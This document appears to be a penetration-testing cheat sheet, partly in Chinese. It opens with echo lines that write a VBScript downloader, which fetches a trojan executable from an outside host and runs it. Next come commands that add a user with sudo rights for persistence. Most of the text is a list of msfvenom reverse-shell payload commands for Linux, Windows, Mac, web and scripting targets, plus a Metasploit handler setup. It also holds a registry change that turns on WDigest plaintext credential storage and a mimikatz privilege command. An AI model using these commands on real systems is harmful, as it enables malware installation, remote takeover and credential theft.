echo Set Post = CreateObject(“Msxml2.XMLHTTP”) >>zl.vbs
echo Set Shell = CreateObject(“Wscript.Shell”) >>zl.vbs
echo Post.Open “GET”,”http://www.jbzj.com/muma.exe”,0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject(“ADODB.Stream”) >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile “c:\zl.exe”,2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run (“c:\zl.exe”) >>zl.vbs

权限维持

添加用户,非交互式设置密码并加入sudo组
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
移动home目录:sudo usermod -d /path/to/new/home -m username

文件下载

tar -cvf log.tar log2012.log 仅打包,不压缩!
tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩
tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST[“AAA”])){
echo “ISSET”;
}else{
echo “UNSET”;
}

这里要构造表单的
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

或者直接burp改,但是必须要Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
对应操作系统使用32或64位程序、
privilege::debug

masscan地址:https://github.com/robertdavidgraham/masscan/

下载包后进入masscan-master中
安装MinGW,(Minimalist GNUfor Windows的缩写)
将MinGW的bin加入path
运行mingw32-make
发现出现错误,找不到stdio.h
打开MakeFile
如下位置加入黑体部分
DEFINES =
CFLAGS = -g -ggdb $(FLAGS2) $(INCLUDES) $(DEFINES) -Wall -O3 ** –target=i686-pc-mingw32 **
#CFLAGS = -g -ggdb -march=i686 -Ivs10/include $(DEFINES) -Wall -O3
.SUFFIXES: .c .cpp
继续编译报错找不到pthread.h
下载pthread,在include中复制pthread.h到mingw目录中的include下
继续编译会报错找不到xxx@16之类的,在makefile中link阶段最后加入 -lws2_32 -liphlpapi
ws2_32 是winsock32,iphlpapi提供了一些非常实用的获取网络信息
https://msdn.microsoft.com/en-us/library/ms923804.aspx